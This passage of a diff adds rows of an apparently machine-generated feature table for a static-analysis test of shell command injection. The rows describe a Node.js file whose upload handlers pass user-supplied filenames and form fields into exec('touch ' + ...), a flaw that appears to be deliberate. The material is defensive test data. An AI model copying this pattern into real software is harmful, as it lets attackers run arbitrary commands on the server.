fieldname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:31:24:39 | fieldname | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:31:24:39 | fieldname | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:31:24:39 | fieldname | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:31:24:39 | fieldname | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:42:24:45 | file | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:42:24:45 | file | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:42:24:45 | file | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:42:24:45 | file | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:42:24:45 | file | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:48:24:55 | filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:58:24:65 | encoding | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:58:24:65 | encoding | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:58:24:65 | encoding | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:58:24:65 | encoding | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:58:24:65 | encoding | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:68:24:75 | mimetype | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:68:24:75 | mimetype | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:68:24:75 | mimetype | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:68:24:75 | mimetype | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:24:68:24:75 | mimetype | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:8 | exec | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:8 | exec | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:8 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exceptional return of exec("t ... lename) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exceptional return of exec("t ... lename) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exceptional return of exec("t ... lename) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exceptional return of exec("t ... lename) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exceptional return of exec("t ... lename) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:5:25:29 | exec("t ... lename) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:17 | "touch " | stringConcatenatedWith | -endpoint- filename | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:10:25:28 | "touch " + filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | contextSurroundingFunctionParameters | (req, res)\n(fieldname, file, filename, encoding, mimetype) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:25:21:25:28 | filename | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:5 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:5 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:5 | req | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:5 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:5 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:10 | req.pipe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:10 | req.pipe | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:10 | req.pipe | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:10 | req.pipe | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:10 | req.pipe | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | exceptional return of req.pipe(busboy) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | exceptional return of req.pipe(busboy) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | exceptional return of req.pipe(busboy) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | exceptional return of req.pipe(busboy) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | exceptional return of req.pipe(busboy) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:3:27:18 | req.pipe(busboy) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:7:27:10 | pipe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:7:27:10 | pipe | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:7:27:10 | pipe | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:7:27:10 | pipe | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:7:27:10 | pipe | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | CalleeFlexibleAccessPath | req.pipe | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | enclosingFunctionBody | req res busboy Busboy headers req headers busboy on file fieldname file filename encoding mimetype exec touch filename req pipe busboy | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:27:12:27:17 | busboy | receiverName | req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:4:28:9 | listen | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:4:28:9 | listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:4:28:9 | listen | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | CalleeFlexibleAccessPath | http.createServer().listen | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:28:11:28:14 | 8000 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:16 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:16 | formidable | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:16 | formidable | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:16 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formida ... dable') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formida ... dable') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formida ... dable') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formidable | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:7:31:40 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:26 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:26 | require | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | exceptional return of require ... dable') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | exceptional return of require ... dable') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | exceptional return of require ... dable') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | require ... dable') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | require ... dable') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:20:31:40 | require ... dable') | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:31:28:31:39 | 'formidable' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:3 | app | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:3 | app | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:8 | app.post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:32:8 | app.post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | app.pos ... });\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:1:43:2 | exceptional return of app.pos ... });\\n}) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:5:32:8 | post | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:5:32:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:5:32:8 | post | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:10:32:22 | '/api/upload' | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:32:24 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:32:24 | formidable | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:32:24 | formidable | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:32:24 | formidable | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:32:24 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | exceptional return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:25:43:1 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields 